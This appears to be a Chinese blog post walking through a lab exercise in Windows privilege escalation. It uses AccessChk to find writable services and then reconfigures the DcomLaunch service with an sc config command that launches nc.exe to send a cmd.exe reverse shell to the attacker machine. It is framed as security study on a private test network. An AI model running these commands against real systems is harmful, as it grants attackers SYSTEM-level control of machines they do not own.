先介绍下一个工具---------->AccessChk
AccessChk是Sysinternals中的小工具,推荐用3.0版本的,新版存在一些bug。
利用这个工具用来检查用户和用户组对文件,目录,注册表项,全局对象和系统服务的权限,在实际配置权限过程中,如果权限设置不当,那么win服务就可能被用于提权
AccessChk的具体介绍可以看这:http://blog.51cto.com/rangercyh/497497
这里我只对要使用的功能选项进行说明
第一次运行会出现一个许可弹窗,可以执行 accesschk.exe /accepteula 来避免弹窗
实验环境 :
靶机: win2003 sp2 IP:192.168.193.130
攻击机: win7 IP:192.168.193.131
在靶机上添加一个simeon用户并加入到Power User组中
然后执行命令 accesschk.exe -uwcqv "Power Users" *
来显示Power User组可以操作的服务名称信息
-u :抑制错误
-w:仅显示具有写访问权限的对象
-c:显示服务名称,输入* 用户与显示所有服务
-q:省略标识
-v:冗长(包括WINDOUWS VISTA完整性级别)
前面的RW表示有读写权限,其中服务名称为“DcomLaunch”和“kdc”服务可以被simeon用户操作
这里我选“DcomLaunch” 进行测试
然后使用“sc qc DcomLaunch”命令查询DcomLaunch的详细信息
可以看到是以系统权限运行的
然后我们在看下是否启动了 net start | find "DCOM Server Process Launcher"
说明服务是启动的
然后在获取这个服务名称提供的服务
运行 tasklist /svc 找到对应服务
接下来就是修改服务并获取系统权限
这里我们还要配置使用nc反弹shell到我的攻击机上
我们把nc放到c:\windows\temp目录下
使用sc对服务进行修改
sc config DcomLaunch binpath= "C:\windows\temp\nc.exe" -nv 192.168.193.131 4433 -e "C:\WINDOWS\system32\cmd.exe"
*注意binpath=后面一定要有个空格
我们在查询下服务
在执行
obj:指定运行服务将使用的帐户名,或指定运行驱动程序将使用的 Windows 驱动程序对象名。默认设置为 LocalSystem。
password:指定一个密码。如果使用了非 LocalSystem 的帐户,则此项是必需的。
最后使用 net start DcomLaunch 命令重启这个服务
攻击机上用nc进行监听4433即可得到反弹的shell
扫一扫
1447
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
